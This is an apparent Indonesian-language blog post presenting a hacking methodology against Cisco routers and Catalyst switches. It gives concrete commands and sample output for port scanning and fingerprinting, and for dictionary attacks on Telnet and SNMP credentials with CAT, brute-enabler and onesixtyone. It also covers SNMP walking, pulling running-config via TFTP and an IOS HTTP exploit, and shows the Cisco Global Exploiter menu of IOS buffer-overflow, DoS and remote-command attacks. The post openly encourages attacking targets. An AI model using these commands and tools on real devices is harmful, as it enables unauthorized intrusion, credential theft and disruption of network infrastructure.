CISCO Hacking Methodology

CISCO Hacking Methodologi??hmm setelah nyari referensinya, ada yang posting dan hasilnya ya hanya metode hehe tapi meskipun begitu metode ini bisa di uji cobakan, aya sebagai pembelajaran aja buat *Lenga-lenga..,metode ini hanya menjelaskan langkah2 yang bisa dipergunakan untuk menempuh perjalanan hackingnya. Masalah “bobol” atau “tidak” ya sangat bergantung pada penyetingan terhadap perangkat tersebut. tapi ingat seperti kata orang Networking “Tidak ada sysrem yang sempurna, dan itu pasti ada celahnya”

Mari kita berbicara Methodologi yang biasa dipergunakan dalam melakukan penyerangan terhadap jaringan berbasis router or catalyst CISCO.

Adapun beberapa metode yang biasa dipergunakan dalam melakukan penyerangan terhadap jaringan berbasis CISCO roter dan catalyst, antara lain :

  1. Port Scaning : metoda ini digunakan untuk mengetahui “live host” dalam jaringan yang kita targetkan.
  2. Fingerprinting : metoda ini digunakan untuk mendapatkan informasi lebih dari devices yang kita jadikan target
  3. Password Guessing : metoda ini biasa digunakan untuk mendapatkan user name dan password terhadap target
  4. SNMP Attack : metoda untuk melakukan pengujian dan penyerangan terhadap protokol SNMP.
  5. Telnet Attack : metoda untuk melakukan pengujian dan penyerangan terhadap layanan TELNET
  6. Web Browser Attack : metoda untuk melakukan pengujian dan penyerangan terhadap HTTP/HTTPS Authentication attack
  7. TFTP : metoda untuk melakukan IOS copy dan IOS backup.
  8. CISCO Bug : memanfaatkan bug dari IOS yang belum di patch.

Mengenal Lebih jauh lagi tentang Metode diatas :

1. Port Scanning

– nmap

  1. Proses scanning sangat efektif sekali jika kita melakukan scanning langsung ke CISCO devices dengan melakukan pengecekan langsung pada TCP dan UDP, maka gunakan perintah nmap, sebagai berikut :

– TCP scan: lakukan pengecekan terhadap IP target dan pengecekan terhadap port, mulai dari port 1 – 65535 hanya pada IP yang menjadi target saja. Hasil pengecekan akan tersimpan pada file TCP.scan.txt.

Perintah yang diperguakan :

nmap  -sT  -O  -v  -p  1-65535    -oN  TCP.scan.txt

–  UDP scan: lakukan pengecekan terhadap UDP, mulai dari port 1 – 65535 pada – This will perform a UDP scan, be verbose,  scan ports 1 – 65535 hanya pada IP yang menjadi target saja. Hasil pengecekan akan tersimpan pada file UDP.sca.txt.

Perintah yang dipergunakan :

nmap  -sU  -v  -p  1-65535    -oN  UDP.scan.txt

2. CISCOS | ciscos

–    Nah, tool ini merupakan tool yang sangat saya gandungi…ada di Backtrack 4 sampe Bactrack 5 R1 juga masih ada.
ciscos biasa dipakai untuk melakukan pencarian CISCO devices yang ada dalam suatu jaringan dengan memanfaatkan CIDR network range.

Usage: ./ciscos

2. Fingerprinting

–    Nah, kalo dikalangan underground yang ada tools yang biasa digunakan untuk melakukan fingerprinting terhadap CISCO devices namanya : cisco-torch. Aplikasi ini akan melakukan FingerPrinting terhadap beberapa layanan diantaranya : SSH, Telnet dan HTTP.

# cisco-torch.pl -A 125.125.100.78

List of targets contains 1 host(s) 14489:
Checking 125.125.100.78… Fingerprint:2552511255251325525324255253311310
Description:Cisco IOS host (tested on 2611, 2950 and Aironet 1200 AP) Fingerprinting Successful

Cisco-IOS Webserver found
HTTP/1.1 401 Unauthorized
Date: Mon, 12 Oct 2011 11:34:11 GMT
Server: cisco-IOS Accept-Ranges: none
WWW-Authenticate: Basic realm=”level_15_access”
401 Unauthorized

–    Okay…kita juga bisa pake nmap untuk mengidentifikasi port2 yang terbuka, yang paling harus kita uji adalah port 23 (Telnet), port 80 (HTTP) dan SNMP agent receives requests on UDP port 161 & 162

# nmap -sV -O -v -p 23,80 -oN TCP.version.txt

# nmap -sV -O -v -p 161,162 -oN UDP.version.txt

 3. Password Guessing

–  Nah, kali ini kita akan berhadapan sama tool yang namanya : CAT (Cisco Auditing Tool), biasanya digunakan untuk melakukan dictionary attack terhadap Telnet server dan SNMP agent router dan catalyst CISCO.

# ./CAT  -h    -a  password.wordlist

# CAT -h 125.125.100.78 -a /tmp/dict.txt

Guessing passwords:
Invalid Password: 1234
Invalid Password: latihan
Invalid Password: cisco
Password Found: england

 –     Ada lagi nih.. yang fungsinya juga sama seperti CAT yaitu : brute-enabler, tools ini memiliki kemampuan untuk melakukan cracking terhadap Telnet.

# ./enabler [-u username] -p password /password.wordlist [port]

# ./enabler  125.125.100.78 telnet  /tmp/dict.txt
[`] OrigEquipMfr… wrong password
[`] Cisco… wrong password
[`] agent… wrong password
[`] all… wrong password
[`] possible password found: england

 4. SNMP Attacks

–    Ayo gan… serang saja protokol SNMP dengan aplikasi yang namanya : CAT (Cisco Auditing Tool). Tools ini mampu mengumpulkan devices cisco dengan cepat dan mampu melakukan password attacking terhadap layanan Telnet dan SNMP agents. Cara pake (baca:pakai) perintahnya gini gan :

# ./CAT  -h    -w  SNMP.wordlist

# ./CAT -h 125.125.100.78 -w /tmp/snmp.txt

Checking Host: 125.125.100.78 
Guessing passwords:
Invalid Password: cisco
Invalid Password: ciscos
Found Password : england

–  Gan… yang ini boleh juga dicoba…nama aplikasinya : Onesixtyone. Aplikasi tersebut sangat dapat diandalkan dalam urusan menebak SNMP string community dengan baik. Apabila SNMP string community telah diidentifikasi dengan benar maka akan ditampilkan hasil informasidengan akurat. ’ga percaya gan…??? coba gih buruan…, nih perintahnya gan…:

# onesixtyone  -c  SNMP.wordlist  

# onesixtyone  -c  dict.txt  125.125.100.78

– Hampir saja ketinggalan nih gan… ada tools namanya : snmpwalk. Snmpwalk merupakan bagian dari SNMP toolkit. Aplikasi ini setelah mengidentifikasi SNMP string community maka akan bekerja untuk mendapatkan informasi berikutnya yaitu SNMP Manegement Information Base (MIB), juga memastikan bahwa yang diperoleh adalah SNMP yang benar dan valid, cara pake tools tersebut gini aza kok gan…ga pake ribet2 :

# snmapwalk  -v    -c    

# snmpwalk -v 1 -c enable 125.125.100.78

 5. Telnet

– Kenapa telnet yang diincer…..?? rata2 konfigurasi VTY pada devices CISCO diaktifkan sehingga layanan telnet aktif dan perlu autentikasi user dan password jika layanan tersebut ingin dipergunakan. Nah… user autentikasi inilah yang kita konsentrasikan untuk coba dibobol.

6. Web Browser

– Udah tau belum ga…??? Pasti juragan udah taulah..kalo saat ini juga sudah banyak devices CISCO yang bisa disetting berbasis HTTP/HTTPS. Nah, mari gan…kita konsentrasi untuk memecahkan proses Web base loginnya. BruteForce dan Dictionary Attack sangat membantu dalam proses ini.

7. TFTP

– TFTP…?? Apa lagi tuh gan..?? TFTP itu kependekan dari Trivial File Transfer Protocol. Ya, sebuah aplikasi berbasis layanan FTP yang biasa dipergunakan untuk melakukan proses backup IOS CISCO dan Configurasi IOS CISCO karena lewat backup kita IOS kita bisa mendapatkan password devices.

  • Cain & Abel 
    Pasti tau dong tool yang 1 ini…berbasis windows lagi…? Kalo ga tau yah kebangetan… Cain & Able bisa digunakan untuk Download dan Upoad CISCO configuration (CCDU), dengan aplikasi ini SNMP RW Community String dan Versi SNMP yang dipergunakan dapat diketahui, kemampuan lainnya adalah mampu melakukan download “running-config” kedalam mesin lokal.
  • Kalo berbicara sploit CISCO nih dia gan…namanya : ios-w3-vuln exploits. Sploit ini akan memanfaatkan bug HTTP Access untuk mengambil “running-config” dan memindahkannya ke TFTP server.

–  Bagaimana mengekstrak file konfigurasi CISCO…?? Don’t worry be happy gan… cisco-torch mampu melakukannya. 

# ./cisco-torch.pl <options> <IP,hostname,network>

# ./cisco-torch.pl -F

8. Explotasi Bug yang sudah ada

– Attack Tools

o Cisco Global Exploiter (CGE-13): aplikasi ini mampu melakukan penyerangan terhadap beberapa bug CISCO IOS. Ada 14 kemampuan penyerangan yang bisa dilakukan. Bijimane gan…. Bagus kan…? 😉
Perintahnya cuma kayak gini nih gan….:

# perl cge.pl

Vulnerability number are :
[1] – Cisco 677/678 Telnet Buffer Overflow Vulnerability
[2] – Cisco IOS Router Denial of Service Vulnerability
[3] – Cisco IOS HTTP Auth Vulnerability
[4] – Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability
[5] – Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability
[6] – Cisco 675 Web Administration Denial of Service Vulnerability
[7] – Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability
[8] – Cisco IOS Software HTTP Request Denial of Service Vulnerability
[9] – Cisco 514 UDP Flood Denial of Service Vulnerability
[10] – CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability
[11] – Cisco Catalyst Memory Leak Vulnerability
[12] – Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability
[13] – 0 Encoding IDS Bypass Vulnerability (UTF)
[14] – Cisco IOS HTTP Denial of Service Vulnerability

*lenga-lenga = teman-teman

Sumber

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s